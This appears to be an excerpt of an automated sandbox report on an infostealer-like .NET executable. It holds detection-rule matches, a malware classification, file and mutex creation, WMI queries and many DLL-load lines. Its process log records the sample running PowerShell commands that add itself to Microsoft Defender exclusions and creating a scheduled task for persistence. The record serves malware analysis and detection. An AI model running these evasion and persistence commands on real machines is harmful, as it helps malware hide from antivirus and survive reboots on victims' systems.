                      Source: kAsh3nmsgs.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: kAsh3nmsgs.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: HHhSyZN.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@19/15@2/2
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; File created: C:\Users\user\AppData\Roaming\HHhSyZN.exe
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Mutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Mutant created: \Sessions\1\BaseNamedObjects\ySytCl
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; File created: C:\Users\user\AppData\Local\Temp\tmp4794.tmp
                      Source: kAsh3nmsgs.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: kAsh3nmsgs.exe | ReversingLabs: Detection: 79%
                      Source: kAsh3nmsgs.exe | Virustotal: Detection: 61%
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | File read: C:\Users\user\Desktop\kAsh3nmsgs.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe | Process created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\HHhSyZN.exe C:\Users\user\AppData\Roaming\HHhSyZN.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe | Process created: C:\Users\user\AppData\Roaming\HHhSyZN.exe "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wbemcomn.dll
